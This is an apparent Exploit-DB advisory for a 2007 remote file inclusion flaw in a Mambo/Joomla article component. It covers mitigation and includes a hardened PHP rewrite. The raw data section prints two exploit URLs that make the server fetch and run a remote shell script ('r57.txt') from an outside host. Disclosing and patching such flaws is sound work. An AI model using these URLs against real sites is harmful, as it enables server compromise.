Vendor: New Article Component
Found by: Cold z3ro
CVSS: 7.5 (HIGH)
CWE: Remote File Inclusion
Product Name: New Article Component
Affected Versions: 1.1 and earlier
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
Year: 2007

Mambo/Joomla Component New Article Component <= 1.1 (absolute_path) Multiple RFI

Both 'components/com_articles.php' and 'classes/html/com_articles.php' build the path of a language file from the variable $absolute_path and pass it to include() without ever assigning that variable in the file. With register_globals enabled, a request parameter of the same name ('absolute_path') defines it, and with allow_url_fopen enabled (the PHP default at the time; on PHP 5.2 and later allow_url_include is the relevant setting) include() fetches the attacker's URL instead of a local file. The trailing '?' in the exploit URLs below turns the rest of the constructed path ('/language/.../lang_com_articles.php') into a query string, so the remote script is fetched unchanged and executed with the privileges of the web server.

Mitigation:

No vendor patch exists. Until one is released, disable the component or block direct requests to the two affected files, and make sure the PHP configuration removes both preconditions: set register_globals to Off so request parameters cannot define $absolute_path, and set allow_url_fopen to Off (allow_url_include to Off on PHP 5.2 and later) so include() cannot fetch remote URLs. Web-server logs can be checked for requests to com_articles.php whose 'absolute_path' parameter contains 'http://' or 'ftp://'.
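The include pattern quoted in the advisory next to a hardened version, as an added example that is not the component's own code. The language directory names, the placement of the _VALID_MOS guard (the direct-access check Mambo/Joomla 1.0 uses), the assumption that the file lives in <site root>/components/, and reading $lang from $_REQUEST are assumptions for illustration.

```php
<?php
// Added example, not code from the New Article Component: the vulnerable
// include quoted in the advisory next to a hardened equivalent.

// --- Vulnerable pattern (as quoted from components/com_articles.php) ---
// include($absolute_path.'/language/'.$lang.'/lang_com_articles.php');
// $absolute_path is never assigned in the file. With register_globals=On a
// request such as ?absolute_path=http://attacker/r57.txt? defines it, and with
// allow_url_fopen=On (allow_url_include=On from PHP 5.2) include() fetches the
// URL. The trailing '?' makes '/language/...' a query string, so the remote
// script is fetched unchanged and executed on the server.

// --- Hardened version ---
// 1. Refuse direct requests: Mambo/Joomla 1.0 defines _VALID_MOS in index.php,
//    so a request straight to this file dies here.
defined('_VALID_MOS') or die('Direct Access to this location is not allowed.');

// 2. Derive the base path from the file's own location, never from input.
//    (Assumes this file lives in <site root>/components/.)
define('ARTICLES_ABSOLUTE_PATH', dirname(dirname(__FILE__)));

// 3. Only accept language names from a fixed list (assumed directory names).
$articles_allowed_langs = array('english', 'german', 'french');

function articles_language_file($lang, $allowed)
{
    // Strict comparison: anything not exactly in the list falls back to english.
    if (!in_array($lang, $allowed, true)) {
        $lang = 'english';
    }
    $langdir = realpath(ARTICLES_ABSOLUTE_PATH . '/language');
    $file    = realpath(ARTICLES_ABSOLUTE_PATH . '/language/' . $lang . '/lang_com_articles.php');
    // Defence in depth: the resolved file must exist and sit under /language,
    // which also rules out URLs, since realpath() only resolves local paths.
    if ($langdir === false || $file === false
        || strpos($file, $langdir . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $file;
}

// $lang is assumed to come from the request; the original took it from globals.
$lang = isset($_REQUEST['lang']) ? (string) $_REQUEST['lang'] : 'english';
$file = articles_language_file($lang, $articles_allowed_langs);
if ($file !== null) {
    include $file;
}
```

The code fix alone is not enough on a shared host: the same php.ini settings named under Mitigation (register_globals = Off, allow_url_fopen = Off or allow_url_include = Off) should be applied as well, because any other file that still uses an unassigned $absolute_path remains exploitable in the same way.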

Exploit-DB raw data:

=======================================================
Mambo/Joomla Component New Article Component <= 1.1 (absolute_path) Multiple RFI
=======================================================
Found By : Cold z3ro , Cold-z3ro@hotmail.com
=======================================================
Homepage: www.Hack-Teach.com
=======================================================
Script Site : 
http://www.jxdevelopment.com/component/option,com_remository/Itemid,0/func,fileinfo/id,4/
==============================================
File : /components/com_articles.php
include($absolute_path.'/language/'.$lang.'/lang_com_articles.php');     <= Line 65
======
http://site/joomla_path/components/com_articles.php?absolute_path=http://nachrichtenmann.de/r57.txt?
========================================================
File : /classes/html/com_articles.php
include($absolute_path.'/language/'.$lang.'/lang_articles.php');     <= Line 24
======
http://site/joomla_path/classes/html/com_articles.php?absolute_path=http://nachrichtenmann.de/r57.txt?
=========================================================


#Long Life Palestine
#www.Hack-Teach.com

# milw0rm.com [2007-04-14]